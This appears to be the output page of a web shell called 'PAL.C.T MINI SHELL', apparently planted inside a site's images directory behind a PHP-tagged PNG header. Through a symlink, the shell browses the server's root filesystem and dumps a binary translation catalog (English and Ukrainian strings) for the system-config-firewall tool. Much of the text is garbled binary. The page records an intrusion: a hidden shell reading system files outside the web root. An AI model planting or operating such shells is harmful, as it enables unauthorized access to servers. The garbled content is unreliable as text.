php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/uk/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/uk/LC_MESSAGES/system-config-firewall.mo

O
$.6e1
1D
WeH}/XO[gnw	J  	 
 [ I!1"L"5[")")"""
#?#N#-S##
#y#$ $)$>9$x$s$$$%9)%c%<~%9%%6&E&
V&d&q&	&&&&&&!&&&&('*9'd'''7'''(
(("(2(L(\(v(P) *(*.*5*9**+#+6+&J+q+v+|+++++++,	,",*,,--l.i//0	0
0)050;0iT0m0V,1E12
22	22
3/$3T4h4{4444444<4K455&6A76y66g7
w77777777788Q3828*88899999@:/:8;S:;L;E;G!<Oi<K<V=I\=$=====%>
+>9>-?>;m>B>|>i?r?
??	???????@@@-@9A@{@@@@@@@@A=QBCCC
CDQDXD`DJqDDDD
DEEEEE8FMFRF^FcFiFGGHlIJ6KKMM-NKNeN%~NpN$O8:OCsOYObPtPaP5YQdQaQXVRRRSTqUVVcZWFYOZ
UZ
cZnZovZZZ
["[2[[^\k\|\]Z]r]]] ]
]] ]^^B^iV^^^^^^^_
_f*_______``4`?!a1aaaaaaabIccWeYMf5ff8gCghHh#bhhhhChui_ii
jjjj*jk)kE2kHxlGm	oo.oLoo+qqw	rLrUr=$sbs!yss
$tS/ttt6t/uv'vgDvv)vw2w-+x]Yx6xvxweyEyA#z,ez2z#z$z{%{
){7{@{(\{&{{{,{1|3:|%n|-|,|j|Z}$t}}}}.}+~..~=]~~D!0?HC*,**D:	<Ą<M>./:&C3P*P݋7_ɍڍ!mCPe61ɒ
,)'	QF[8ە=/0`TrǖeE&l!Țݚ00DIe&DmXV^^ў#H
FSxavur`n{{AwN)+;gHЦ	buWͧT1#Uo
ĩFIZ1v'yЪ/Jz~C0۫(o5xQp;ܲ0$ʳ-
';Kc#Bӵ'0kXĶɶ۶G2At3׼gt,XK-/@C>Y6~BY,`D/t5),_w5}+E
We!2TrYyQ1)<[)/s*8>
FQ!jb5	0C<f3;4)p![.{EPDA@9/H~	II4TID-R@
DY`'zAH}
G[J35*VG	?6m>1>WZ8/lu~
bUq2?.9#;4%6hBM7Qd;S%^P
p:r)!X$	N/cgiFxe2,9=_o( ('L=kt#a|E<,yK)8"A7CN\C1<BvO"]:H$+Kwj50E n*F&{sL03.&fOJM-+@!
ERROR - You must be root to run %s.%(option)s option requires %(count)s arguments%s is not a valid protocol.%s is not a valid range (start port >= end port).%s option does not take a value%s option requires an argument(modified)<b>Basic Firewall Settings</b><b>Configuration</b><b>Destination</b><b>Information</b><b>Source</b><b>User Skill Level</b><b>Your current configuration is empty, all traffic will be blocked.</b><big><b>Firewall Configuration Wizard</b></big><i>Save on stop</i> and <i>Save on restart</i> additionally save rule and chain counter.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>A <i>"System without network access"</i> does not need a firewall at all. This selection disables the firewall. Otherwise, choose <i>"System with network access"</i>.A firewall allows other computers to access selected services on your computer and helps to prevent unauthorized access beyond these selections. Select the services to which the firewall should allow access.A firewall protects against unauthorized network intrusions. Enabling a firewall blocks all incoming connections. Disabling a firewall allows all connections and is not recommended. AddAdd EntryAdd InterfaceAdd additional ports or port ranges, which need to be accessible for all hosts or networks.Add entries to forward ports either from one port to another on the local system or from the local system to another system. Forwarding to another system is only useful if the interface is masqueraded. Port forwarding is IPv4 only.Address '%s' is not valid.All %s devicesAllow access to necessary ports or port ranges, only.Allow access to necessary services, only.Allow all traffic on the specified deviceAmanda Backup ClientApplyApply changesAuthentication is required to read and modify firewall settingsBackBackwards compatibility, aliased to --enabledBaculaBacula ClientBacula is a network backup solution. Enable this option, if you plan to provide Bacula backup, file and storage services.Be more verboseBeginnerBeginner
ExpertBlock this ICMP type. The default is to accept all ICMP types.CancelClicking the 'Yes' button will override any existing firewall configuration. Are you sure that you want to do this?CloseConfiguration failedConfigure SELinux mode: %sConfigure SELinux type: Usually targeted or strict PolicyConfigure Service SettingsConfigure firewall but do not activate the new configurationConfigure firewall helper modules for connection trackingConfigure firewall rulesConfigure the iptables and ip6tables service settings.Conntrack HelperConverting %sCustom RulesCustom Rules FileCustomizeDNSDefault:DescriptionDesktopDesktop
ServerDestination (at least one needed)Destination UnreachableDisableDisable FirewallDisable Internet Printing Protocol (IPP)Disable Internet Protocol Security (IPsec)Disable Multicast DNS (mDNS)Disable an iptables moduleDisable firewallERROR: FirewallD is active, please use firewall-config.Echo Reply (pong)Echo Request (ping)EditEdit EntryEnableEnable FirewallEnable an iptables moduleEnable firewallEnable firewall (default)Enable this option if you want to allow remote virtual machine management with SASL authentication and encryption (digest-md5 passwords or GSSAPI/Kerberos). The libvirtd service is needed for this option to be useful.Enable this option if you want to allow remote virtual machine management with TLS encryption, x509 certificates and optional SASL authentication. The libvirtd service is needed for this option to be useful.EnabledErrorExpertFTPFTP is a protocol used for remote file transfer. If you plan to make your FTP server publicly available, enable this option. You need the vsftpd package installed for this option to be useful.Failed to remove %s.Failed to start %s.Failed to stop %s.Failed to write %s.Failed to write selinux configuration.FileFile:FilenameFirewallFirewall ConfigurationFirewall Configuration StartupFirewall Configuration WizardFirewall TableFirewall Table:Firewall authorizationFirewall:ForwardForward the port with protocol for the interface to either another local destination port (no destination address given) or to an other destination address with an optional destination port. This is IPv4 only.Forward to another portHTTP is the protocol used to serve Web pages. If you plan to make your Web server publicly available, enable this option. This option is not required for viewing pages locally or developing Web pages.HTTPS is a modified HTTP used to serve Web pages when security is important. Examples are sites that require logins like stores or web mail. This option is not required for viewing pages locally or developing Web pages. You need the httpd package installed for this option to be useful.Here you can define which services are trusted. Trusted services are accessible from all hosts and networks.Hit <i>OK</i> to apply your changes. You do not need to restart the firewall, the changes are effective as soon as they are applied.Hit enter to continue.ICMP FilterICMP TypeIMAP over SSLIP address:IPsecIPv6 has no nat support.If you clear the <i>keep configuration</i> button, the actual firewall configuration will be overwritten.If you enable local forwarding, you have to specify a port. This port has to be different to the source port.If you enable masquerading, IP forwarding will also be enabled for your IPv4 networks.If you need further firewall settings, please modify your configuration by hand, but keep in mind, that this tool is not able to load your custom configuration. If you are using this tool, all your manual changes will be lost. If you do not want to lose your manual configuration changes, leave this program without applying.IgnoreIgnore AllIgnore actual settingsInterfaceInterface '%s' is not valid.Interface:Internet Protocol Security (IPsec) incorporates security for network transmissions directly into the Internet Protocol (IP). IPsec provides methods for both encrypting data and authentication for the host or network it sends to. If you plan to use a vpnc server or FreeS/WAN, do not disable this option.Invalid argument %sKeep ConfigurationKey:List predefined services.List the supported icmp types.LoadLoad _Default ConfigurationLocal forwardingMail (SMTP)Make sure to open the destination port on the remote system.Mark all interfaces as trusted which should have full access to the system.Mark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.Mark the interfaces to be masqueraded.Masquerades traffic from the specified device. This is IPv4 only.MasqueradingMasquerading allows you to set up a host or router that connects your local network to the internet. Your local network will not be visible and the hosts appear as a single address on the internet. Masquerading is IPv4 only.Move Entry DownMove Entry UpMulticast DNS (mDNS)NFS4Network Printing Client (IPP)Network Printing Server (IPP)NoNo configurationNot configuredNumeric status outputOKOld firewall configuration.Only mark interfaces if you can trust all participants on that network interface.Open specific ports in the firewall (e.g, ssh:tcp)Open the firewall for a service (e.g, ssh)OpenVPNOpenVPN is a virtual private network (VPN) solution. It is used to create encrypted point-to-point tunnels between computers. If you plan to provide a VPN service, enable this option.Other PortsPOP-3 over SSLParameter ProblemParse error in config filePlease answer the questions in the following configuration steps. The wizard leads you back to the main application and hides all unnecessary configuration options.Please check your firewall settings after applying custom rules.Please enter a port or port range and protocol.Please enter a valid port number, service name or range.Please load a default configuration from the <i>Options</i> menu or use the wizard.Please remember to check if the services iptables and ip6tables are enabled.Please remember to check your firewall configuration before using it.Please select an entry from the list or enter a interface further down.Please select an entry from the list or enter a port and protocol further down.Please select keep configuration or choose to load a default configuration.Please select the protocol type, the firewall table and the file containing the rules.Please select the source and destination options according to your needs.Please specify your firewall skills.PortPort / Port Range:Port ForwardingPort and ProtocolPort or port range '%s' is not valid.Port/ProtocolPort:Predefined Services with Default Environment:Print a counter/number for every rule in the status output.Print addresses and ports in numeric format for the status output.Print information about the number of packets and bytes plus the <i>input-</i> and <i>outputdevice</i> in the status output.ProtocolProtocol '%s' is not valid.Protocol TypeProtocol Type:Protocol:QuitRADIUSRed Hat Cluster SuiteRedirectReloadReload current configurationRemoveRemove EntryRouter AdvertisementRouter SolicitationRun noninteractively; process only command-line argumentsSELinux Options (deprecated)SSHSambaSamba ClientSave and restore counterSave on restartSave on stopSave the active firewall configuration with all changes since the last start before restarting the firewall. Only do this if you need to preserve the active state for the next start.Save the active firewall configuration with all changes since the last start before stopping the firewall. Only do this if you need to preserve the active state for the next start.Secure Shell (SSH) is a protocol for logging into and executing commands on remote machines. It provides secure encrypted communications. If you plan on accessing your machine remotely via SSH over a firewalled interface, enable this option. You need the openssh-server package installed for this option to be useful.Secure WWW (HTTPS)SelectSelect <i>"Expert"</i> if you are familiar with firewall configurations or if you need to add user customized rules. Otherwise, choose <i>"Beginner"</i>.Select a FileServerServiceService SettingsSet firewall default type: %s. This overwrites any existing configuration.Show this help messageShow versionSource (all needed)Source QuenchSpecify a custom rules file for inclusion in the firewall, after the default rules. Default protocol type: ipv4, default table: filter. (Example: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Start WizardStart configuration wizardStatus line numbersSupported icmp types:System without network access
System with network accessTFTPTFTP ClientTODOTableThe Amanda backup client option allows you to connect to a Amanda backup and archiving server. You need the amanda-client package installed for this option to be useful.The Domain Name System (DNS) is used to provide and request host and domain names. Enable this option, if you plan to provide a domain name service (e.g. with bind).The Internet Message Access Protocol over SSL (IMAPs) allows a local client to access email on a remote server in a secure way. If you plan to provide a IMAP over SSL service (e.g. with dovecot), enable this option.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over tcp) provides the ability to share printers over the network. Enable this option if you plan to share printers via cups over the network.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over udp) provides the ability to get information about a printer (e.g. capability and status) and to control printer jobs. If you plan to use a remote network printer via cups, do not disable this option.The NFS4 protocol is used to share files via TCP networking. You will need to have the NFS tools installed and properly configure your NFS server for this option to be useful.The Post Office Protocol version 3 (POP3) is a protocol to retrieve email from a remote server over a TCP/IP connection. Enable this option, if you plan to provide a POP3 service (e.g. with dovecot).The Remote Authentication Dial In User Service (RADIUS) is a protocol for user authentication over networks. It is mostly used for modem, DSL or wireless user authentication. If you plan to provide a RADIUS service (e.g. with freeradius), enable this option.The Trivial File Transfer Protocol (TFTP) is a protocol used to transfer files to and from a remote machine in s simple way. It is normally used only for booting diskless workstations and also to transfer data in the Preboot eXecution Environment (PXE).The file '%s' does not exist.The firewall configuration is not consistent.The firewall is disabled.The firewall is enabled.The firewall table '%s' is not valid.The following files are missing or unusable:
	%s

Apply your firewall configuration now to correct this problem.The protocol type '%s' is not valid.There are unapplied changes, do you really want to quit?This error message informs a host to send packets on another route.This error message is generated by a host or gateway if the destination is not reachable.This error message is generated if the IP header is bad, either by a missing option or bad length.This error message is generated if the time-to-live was exceeded either of a packet or of the reassembling of a fragmented packet.This error message is generated to tell a host to reduce the pace at which it is sending packets.This message is the answer to an <i>Echo Request</i>.This message is used by a host attached to a multicast link to request a <i>Router Advertisement</i>This message is used by routers to periodically announce the IP address of a multicast interface.This message is used to test if a host is reachable mostly with the <i>ping</i> utility.This option allows a Bacula server to connect to the local machine to schedule backups. You need the bacula-client package installed for this option to be useful.This option allows incoming SMTP mail delivery. If you need to allow remote hosts to connect directly to your machine to deliver mail, enable this option. You do not need to enable this if you collect your mail from your ISP's server by POP3 or IMAP, or if you use a tool such as fetchmail. Note that an improperly configured SMTP server can allow remote machines to use your server to send spam.This option allows you to access Trivial File Transfer Protocol (TFTP) servers. You need the tftp package installed for this option to be useful.This option allows you to access Windows file and printer sharing networks. You need the samba-client package installed for this option to be useful.This option allows you to access and participate in Windows file and printer sharing networks. You need the samba package installed for this option to be useful.This option allows you to use the Red Hat Cluster Suite. Ports are opened for openais, ricci and dlm. You need the Red Hat Cluster Suite installed for this option to be useful.This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.This program will help you to set up a basic firewall for your system.This wizard helps you to set up a clean firewall configuration for your system.Time ExceededTo AddressTo PortTo ensure a sane state, the kernel firewall modules must be unloaded when the firewall is restarted or stopped.Trusted InterfacesTrusted ServicesTypeUnload modules on restart and stopUpdate firewall non-interactively if the firewall is enabled. This will also restart the firewall. The -n and -f options will be ignored.Use custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.User DefinedUser Skill LevelUsing these options with no additional firewall options will not create or alter firewall configuration, only SELinux will be configured.Valid values: %sValid values: <port>[-<port>], where port is either a number [0..65535] or a service name.Valid values: tcp, udpVerbose statusVirtual Machine ManagementVirtual Machine Management (TLS)WWW (HTTP)WarningWhat kind of system do you have?WizardYesYou can change the settings in the <i>Options</i> menu afterwards.Your firewall configuration was converted from an old version. Please verify the configuration and apply.[<type>:][<table>:]<filename>_About_File_Help_Options_Quit_Start Configuration Wizardconfigurationif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]invalid interface '%s'.invalid port definition %s.invalid service '%s'.ipv6 has no nat support.localmDNS provides the ability to use DNS programming interfaces, packet formats and operating semantics in a small network without a conventional DNS server. If you plan to use Avahi, do not disable this option.modified labelno such option: %soption %(option)s: invalid forward_port '%(value)s'.option %(option)s: invalid forward_port '%(value)s': %(error)s.option %(option)s: invalid icmp type '%(value)s'.port range %s is not unique.system-config-firewalltranslator-creditsyesFirewall ConfigurationyesMark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.yesThe Internet Control Message Protocol (ICMP) is mainly used to send error messages between networked computers, but additionally for informational messages like ping requests and replies.yesUse custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.Project-Id-Version: system-config-firewall
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2011-02-16 16:32+0200
PO-Revision-Date: 2013-11-20 09:28+0000
Last-Translator: Yuri Chornoivan <yurchor@ukr.net>
Language-Team: Ukrainian (http://www.transifex.com/projects/p/system-config-firewall/language/uk/)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: uk
Plural-Forms: nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2);

ПОМИЛКА - Для запуску %s необхідно мати права root.параметр %(option)s має %(count)s обов'язкових аргументів%s не є допустимим протоколом.%s не є допустимим діапазоном (номер початкового порту має бути більшим номера кінцевого порту)параметр %s не приймає значенняпараметр %s має обов'язковий аргумент(змінено)<b>Основні параметри мережного екрана</b><b>Налаштовування</b><b>Ціль</b><b>Інформація</b><b>Джерело</b><b>Рівень кваліфікації користувача</b><b>Наразі конфігурація порожня, весь трафік буде заблокований.</b><big><b>Помічник налаштовування мережного екрана</b></big><i>Зберігати при зупинці</i> та <i>Зберігати при перезапуску</i> додатково зберігають правило та лічильник ланцюжка.<тип icmp><інтерфейс><режим><модуль><порт>[-<порт>]:<протокол><служба><тип>При варіанті <i>"Система без доступу до мережі"</i> вам взагалі не потрібен мережний екран, тому його можна зовсім вимкнути. У іншому разі виберіть <i>"Система з доступом до мережі"</i>.Мережний екран дозволяє надавати доступ до певних служб на вашому комп'ютері з боку інших систем та заборонити несанкціонований доступ зовні. До яких служб бажаєте надати доступ?Мережний екран захищає від несанкціонованого вторгнення з мережі. Вмикання екрана блокує всі вхідні з'єднання. Вимкнення екрана дозволяє всі з'єднання, але це не рекомендується. ДодатиДодати записДодати пристрійДодати додаткові порти або діапазон портів, які мають бути доступні для всіх вузлів чи мереж.Додайте записи для перенаправлення портів або з одного порту другому в локальній системі, або з локальної системи іншій системі. Перенаправлення іншій системі має сенс при маскараді інтерфейсу. Перенаправлення портів використовується лише для IPv4.Неприпустима адреса '%s'.Усі %s пристроївДозволити доступ лише до потрібних портів або діапазонів портів.Дозволити доступ лише до потрібних служб.Дозволити весь трафік через вказаний пристрійКлієнт резервного копіювання AmandaЗастосуватиЗастосувати зміниДля читання та зміни параметрів мережного екрана потрібна автентифікаціяНазадДля зворотної сумісності, псевдонім для --enabledBaculaКлієнт BaculaBacula — програма для створення резервних копій мережею. Позначте цей пункт, якщо ви плануєте користуватися можливостями резервного копіювання файлів та сховищ даних Bacula.Режим з докладним виводомПочатківецьПочатківець
ФахівецьЗаблокувати цей тип ICMP. Типово, дозволяються всі типи ICMP.СкасуватиНатискання на кнопку "Так" призведе до встановлення рівня безпеки вашої системи та перезапису існуючих параметрів мережного екрана. Ви дійсно бажаєте це зробити?ЗакритиПомилка при налаштовуванніНалаштуйте режиму SELinux: %sНалаштуйте тип SELinux: Звичайні політика targeted або strictНалаштувати параметри службиНалаштувати мережний екран, але не активувати нову конфігураціюНалаштувати додаткові модулі екрана для стеження за з'єднаннями.Налаштування правил мережного екранаНалаштувати параметри ptables та ip6tables.Помічник у системі ConntrackВиконується перетворення %sСпеціальні правилаВласний файл правилНалаштуватиDNSТипово:ОписРобоча станціяРобоча станція
СерверЦіль (принаймні одна)Ціль недоступнаВимкнутиВимкнути мережний екранВимкнути Internet Printing Protocol (IPP)Вимкнути Internet Protocol Security (IPsec)Вимкнути Multicast DNS (mDNS)Вимкнути модуль для iptablesВимкнути мережний екранПОМИЛКА: задіяно FirewallD, будь ласка, скористайтеся firewall-config.Відповідь (pong)Запит відповіді (ping)ПравкаЗмінити записУвімкненоУвімкнути мережний екранЗадіяти модуль для iptablesУвімкнути мережний екранУвімкнути мережний екран (типово)Позначте цей пункт, якщо ви бажаєте дозволити віддалене керування віртуальною машиною на основі розпізнавання SASL та шифрування (паролів digest-md5 або GSSAPI/Kerberos). Щоб скористатися цим пунктом, вам слід встановити і запустити службу libvirtd.Позначте цей пункт, якщо ви бажаєте дозволити віддалене керування віртуальною машиною на основі шифрування TLS,  сертифікатів x509 та додатковими можливостями розпізнавання SASL. Щоб скористатися цим пунктом, вам слід встановити і запустити службу libvirtd.УвімкненоПомилкаЕкспертFTPFTP - це протокол для передавання файлів. Якщо ви плануєте зробити загальнодоступний FTP сервер, увімкніть цей параметр. Щоб цей параметр був корисний необхідно встановити пакет vsftpd.Не вдається видалити %s.Не вдається запустити %s.Не вдається зупинити %s.Не вдається записати %s.Помилка при записі конфігурації selinux.ФайлФайл:Назва файлуМережний екранНалаштовування мережного екранаНалаштовування мережного екранаПомічник налаштовування мережного екранаТаблиця мережного екранаТаблиця мережного екрана:Уповноваження мережного екранаМережний екран:ВпередПеренаправте порт з протоколом для інтерфейсу або іншому локальному порту (якщо цільову адресу не вказано), або іншій адресі (можна додатково вказати порт). Лише для IPv4.Направити іншому портуHTTP - це протокол, який використовується для надання веб-сторінок. Якщо ви плануєте зробити загальнодоступний веб-сервер, увімкніть цей параметр. Цей параметр не потрібен для локального перегляду веб-сторінок чи для їх розробки.HTTPS - це модифікація HTTP, що використовується для обслуговування-веб сторінок, якщо безпека грає велику роль. Прикладом є сайти, для входу на які потрібно ввести пароль, наприклад магазини чи сервери ел. пошти Web Mail. Цей параметр не потрібен для локального перегляду веб-сторінок чи для їх розробки. Щоб цей параметр був корисний необхідно встановити пакет httpd.Тут можна визначити, які служби є довіреними. Тобто які служби, будуть доступні з усіх вузлів чи мереж.Для застосування змін натисніть <i>Гаразд</i>. Немає потреби перезапускати екран, зміни наберуть сили негайно.Натисніть Enter для продовження.Фільтр ICMPТип ICMPIMAP через SSLАдреса IP:IPsecIPv6 не підтримує nat.Якщо ви скасуєте вибір <i>залишити конфігурацію</i>, існуючі параметри екрана будуть перевизначені.Якщо ви увімкнете перенаправлення, треба вказати порт. Цей порт має відрізнятися від порту джерела.Якщо ви увімкнете маскарад, також буде увімкнено перенаправлення IP для ваших мереж IPv4.Якщо потрібне подальше налаштовування, змінюйте конфігурацію вручну, але пам'ятайте , ця утиліта не в змозі завантажувати довільну конфігурацію. Якщо ви будете користуватися цією утилітою, усі зроблені вручну зміни буде втрачено.
Якщо ви не бажаєте втратити зроблені зміни, вийдіть з програми без застосування змін.ІгноруватиІгнорувати всеІгнорувати поточні параметриПристрійНеприпустимий пристрій '%s'.Пристрій:Internet Protocol Security (IPsec) забезпечує безпеку прямої передачі протоколу Internet Protocol (IP) через мережу. IPsec впроваджує методи для шифрування та автентифікації вузла чи мережі, з якою встановлено зв'язок. Якщо ви плануєте використовувати серер vpnc чи FreeS/WAN, не вимикайте цей параметр.Неправильний аргумент %sЗалишити конфігураціюКлюч:Показати попередньо визначені служби.Показати підтримувані типи icmp.ЗавантажитиЗавантажити _типову конфігураціюЛокальне перенаправленняПошта (SMTP)Відкрийте цільовий порт у віддаленій системі.Позначити всі пристрої як довірені, що надасть можливість повного доступу до системи.Позначте у списку типи ICMP, яким слід відмовити у проходженні через мережний екран. Типово обмежень немає.Позначити всі пристрої для маскараду.Виконувати маскарад для всього трафіку з вказаного пристрою. Лише для IPv4.МаскарадМаскарад корисний для налаштовування вузла чи маршрутизатора, що з'єднує локальну мережу з Інтернет. Локальна мережа не буде видимою, у Інтернет буде видимий лише один вузол. Маскарад застосовується лише до IPv4.Перемістити внизПеремістити вгоруMulticast DNS (mDNS)NFS4Клієнт мережного друку (IPP)Сервер мережного друку (IPP)НіБез параметрівНе налаштованоЧисловий вивід стануГараздСтара конфігурація мережного екрана.Позначте інтерфейси, лише якщо ви довіряєте всім учасникам у відповідній мережі.Дозволити певні порти через мережний екран (наприклад, ssh:tcp)Відкрити мережний екран для служб (наприклад, ssh)OpenVPNOpenVPN є рішенням для віртуальних приватних мереж (VPN, Virtual Private Network) та використовується для створення прямих тунелів між комп'ютерами. Увімкніть цей параметр, якщо ви хочете надавати послуги VPN.Інші портиPOP-3 через SSLПроблема параметраПомилка при розборі файлу конфігураціїДайте відповіді на питання у наступному кроку встановлення. Після завершення помічника ви повернетесь до головної програми, при цьому невикористані параметри будуть приховані.Після застосування правил, перевірте параметри мережного екрана.Введіть номер порту або діапазон портів, та протокол.Введіть коректний номер порту, назву служби або діапазон портів.Завантажте стандартні параметри з меню <i>Параметри</i> або скористайтесь помічником налаштовування.Не забудьте перевірити, що служби iptables та ip6tables не заблоковані.Не забудьте перевірити конфігурацію мережного екрана перед його використанням.Виберіть запис зі списку або вкажіть нижче пристрій.Виберіть запис зі списку або вкажіть нижче порт та протокол.Можна зберегти конфігурацію або завантажити поточну конфігурацію.Виберіть тип протоколу, таблицю мережного екрана та файл з правилами.Виберіть параметри джерела та цілі.Вкажіть ваш рівень знань мережних екранів.ПортПорт / діапазон портів:Перенаправлення портівПорт та протокол:Некоректний порт чи діапазон портів '%s'.Порт/протоколПорт:Попередньо визначені служби у стандартному оточенні:Показує лічильник/кількість для кожного правила у виводі стану.Адреса друку та порти у числовому форматі для виводу у стандартний потік.Показує інформацію про кількість пакетів та байтів, а також <i>inputdevice</i> та <i>outputdevice</i> при виводі статусу.ПротоколНеприпустимий протокол '%s'.Тип протоколуТип протоколу:Протокол:ВийтиRADIUSRed Hat Cluster SuiteПеренаправленняПерезавантажитиПерезавантажити поточну конфігураціюВидалитиВИдалити записОголошення маршрутизатораЗапит маршрутизатораНеінтерактивний режим; лише обробляти параметри командного рядкаПараметри SELinux (застарілі)SSHSambaКлієнт SambaЗберігати та відновлювати лічильникЗберігати при перезапускуЗберігати при зупинціЗберегти поточну конфігурацію мережного екрана з усіма змінами з моменту останнього запуску перед перезапуском екрана. Це варто робити, лише коли треба зберегти активний стан для наступного запуску.Зберегти поточну конфігурацію мережного екрана з усіма змінами з моменту останнього запуску перед зупинкою екрана. Це варто робити, лише коли треба зберегти поточний активний стан для наступного запуску.Secure Shell (SSH) - протокол для реєстрації та виконання команд  на віддалених комп'ютерах. Він надає можливість безпечного зашифрованого зв'язку. Якщо ви плануєте підключатись до вашої системи через SSH через інтерфейс який контролюється мережним екраном, тоді увімкніть цей параметр. Для цього необхідно встановити пакет openssh-server.Безпечний WWW (HTTPS)ВиберітьВиберіть <i>"Фахівець"</i> якщо ви знайомі з принципами налаштовування мережних екранів та якщо ви хочете додавати власні правила. У іншому випадку виберіть <i>"Початківець"</i>.Виберіть файлСерверСлужбаПараметри службиВказати первинний тип екрана: %s. При цьому поточну конфігурацію буде перевизначено.Показати цю довідкуПоказати версіюДжерело (всі обов'язкові)Сповільнення джерелаВкажіть власні правила для включення до правил мережного екрана. Вони будуть додані після типових правил. Стандартний тип: ipv4, типова таблиця: filter. (Приклад: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Запустити помічникЗапустити помічника налаштовуванняНомери рядківПідтримувані типи icmp:Система без доступу до мережі
Система з доступом до мережіTFTPКлієнт TFTPЗРОБИТИТаблицяКлієнт резервного копіювання Amanda дозволяє з'єднуватися з сервером резервного копіювання та архівування Amanda. Для використання цієї можливості має бути встановлено пакет amanda-client.Domain Name System (DNS) - використовується для надання та запитів назв вузлів та доменів.  Увімкніть цей параметр, якщо ви плануєте запускати службу доменних назв (наприклад, bind).Internet Message Access Protocol через SSL (IMAPs) дозволяє локальному клієнтові отримувати доступ до електронної пошти на віддаленому сервері безпечним чином. Увімкніть цей параметр, якщо ви плануєте запускати службу IMAP через SSL (наприклад, використовуючи dovecot).Internet Printing Protocol (IPP) використовується для розподіленого друку. Він забезпечує можливість (over tcp) спільно використовувати принтери у мережі. Якщо ви будете  надавати доступ з мережі до цього принтера через cups, увімкніть цей параметр.Internet Printing Protocol (IPP) використовується для розподіленого друку. Він забезпечує можливість (через udp) отримати інформацію про принтер (наприклад, його можливості та статус), а також керування завданнями. Якщо ви плануєте використовувати мережний принтер через cups, не вимикайте цей параметр.Цей параметр дозволяє використовувати протокол NFS версії 4 використовуючи TCP для надання спільного доступу до файлів. Щоб цей параметр набрав сили треба встановити пакет утиліт NFS та правильно налаштувати ваш NFS сервер.Post Office Protocol версії 3 (POP3) - протокол отримання електронної пошти з віддаленого сервера через з'єднання TCP/IP. Увімкніть цей параметр, якщо плануєте запускати службу POP3 (наприклад, використовуючи dovecot).Remote Authentication Dial In User Service (RADIUS) - протокол автентифікації у мережі. Він широко використовується для автентифікації користувачів для модемного, DSL чи бездротового зв'язку. Увімкніть цей параметр, якщо ви плануєте запускати службу RADIUS (наприклад, freeradius).Протокол TFTP (Trivial File Transfer Protocol) спрощує передачу файлів віддаленій машині та їх отримання. Звичайно TFTP використовується лише для завантаження бездискових систем та для передачі даних у оточенні PXE (Preboot eXecution Environment).Файл '%s' не існує.Невідповідність конфігурації мережного екрана.Мережний екран вимкнено.Мережний екран увімкнено.Таблиця екрана '%s' не є припустимою.Наступні рядки відсутні або некоректні:
	%s

Застосуйте параметри екрана, щоб вирішити цю проблему.Тип протоколу '%s' не є припустимим.Деякі зміни не були застосовані, вийти попри все?Це повідомлення про помилку радить направити пакет за іншим маршрутом.Це повідомлення генерується вузлом або шлюзом, якщо ціль недоступна.Це повідомлення про помилку генерується, якщо неправильний заголовок IP, наприклад, відсутній параметр або його довжина неправильна.Це повідомлення про помилку генерується у випадку перевищення значення «time-to-live» пакету або повторно зібраного фрагментованого пакету.Це повідомлення про помилку радить вузлу зменшити швидкість надсилання пакетів.Це відповідь на <i>запит відповіді</i>.Це повідомлення використовується вузлом, що відповідає посиланню Multicast, для запиту <i>оголошення маршрутизатора</i>.Це повідомлення використовується маршрутизаторами для періодичного оголошення IP-адреси широкомовного інтерфейсу.Це повідомлення буде використовуватись для перевірки можливості доступу до вузла за допомогою утиліти <i>ping</i>.Цей пункт дозволяє серверу Bacula встановлювати з’єднання з локальним комп’ютером для створення резервних копій за розкладом. Щоб скористатися цим пунктом, вам слід встановити пакунок bacula-client.Цей параметр дозволяє вхідні з'єднання доставки пошти по протоколу SMTP. Якщо ви бажаєте дозволити під'єднання віддалених комп'ютерів для доставки вам пошти, увімкніть цей параметр. Його не потрібно вмикати, якщо ви отримуєте пошту з поштових серверів вашого постачальника Інтернет по протоколах POP3 чи IMAP, або користуєтесь програмою fetchmail. Зверніть увагу, неправильно налаштований SMTP сервер можуть використовувати віддалені комп'ютери для надсилання спаму.Цей параметр дозволяє отримувати доступ к серверам TFTP. Але для цього потрібно встановити пакет tftp.Цей параметр дозволяє отримати доступ до мережі Windows для загального доступу до файлів та принтерів. Треба установить пакет samba-client для того, щоб цей параметр набрав сили.Цей параметр дозволяє надавати доступ до файлів та принтерів свого комп'ютера клієнтам мережі Windows.Треба установить пакет samba для того, щоб цей параметр набрав силиЦей параметр дозволяє користуватися можливостями Red Hat Cluster Suite. Порти будуть відкриті для openais, ricci and dlm. Але для цього потрібно встановити Red Hat Cluster Suite.Ця програма є вільною; ви можете поширювати її та/або змінювати її на умовах GNU General Public License що опублікована Free Software Foundation; версії 2 цієї ліцензії або (за вашим бажанням) більш пізньої версії

